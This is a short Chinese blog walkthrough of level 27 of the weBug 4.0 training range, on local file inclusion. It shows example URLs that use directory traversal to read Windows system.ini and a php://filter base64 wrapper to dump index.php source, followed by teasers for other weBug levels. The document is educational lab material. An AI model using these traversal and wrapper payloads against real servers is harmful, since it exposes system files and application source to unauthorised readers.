美文网首页
weBug 4.0 第27关 文件包含漏洞

weBug 4.0 第27关 文件包含漏洞

作者: gelinlang | 来源:发表于2019-04-11 22:13 被阅读0次

可以看到url如下,明显的文件包含,直接读取文件。

http://192.168.43.147/control/more/file_include.php?filename=../../template/dom_xss.html

直接payload,写这么多../是为了到达c盘根目录。

http://192.168.43.147/control/more/file_include.php?filename=../../../../../../WINDOWS/system.ini

还可以用php伪协议读取文件源码,比如WWW目录下的index.php

http://192.168.43.147/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php

将得到base64字符串,解码得到index.php源码

相关文章

  • weBug 4.0 第27关 文件包含漏洞

    可以看到url如下,明显的文件包含,直接读取文件。 直接payload,写这么多../是为了到达c盘根目录。 还可...

  • weBug 4.0 第23关 支付漏洞

    这算是业务逻辑漏洞吧,直接抓包,点击购买,可以看到价格用get传送,将其修改为10,返回你支付了10元。

  • weBug 4.0 第17关 文件上传畸形文件

    上传文件名为hack.pphphp。上传成功,访问路径,显示出php配置信息。它会寻找php然后将其替换成空。,所...

  • weBug 4.0 第30关 ssrf

    构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF 形成的...

  • weBug 4.0 第17关 文件上传前端拦截

    17前端拦截:首先创建一个php文件,内容如下。然后选择文件上传。刚选中,就弹...

  • weBug 4.0 第13关 过滤xss

    输入点在http://192.168.1.103/control/xss/filter_xss.php?id=1。...

  • php安全

    文件包含漏洞** 本地文件包含**能打开并包含本地文件的漏洞,被称为本地文件包含漏洞(LFI)%00截断,php内...

  • weBug 4.0 第12关 dom型xss

    dom型是有点特殊的xss,它是基于DOM文档对象模型的操作,通过前端脚本修改页面的DOM节点形成的XSS,该操作...

  • weBug 4.0 第10关 存储型xss

    先找输入点,直接滑到最下面,有一个留言。直接测试 alert(/xss/) 。提交后弹窗。依旧构造 alert(d...

  • weBug 4.0 第9关 反射型xss

    偶然看到了这个基础靶场,安装看了下挺简单的,直接虚拟机打开,启动phpstudy就能访问了。先看下xss吧。 先找...

网友评论

      本文标题:weBug 4.0 第27关 文件包含漏洞

      本文链接:https://www.haomeiwen.com/subject/etrfwqtx.html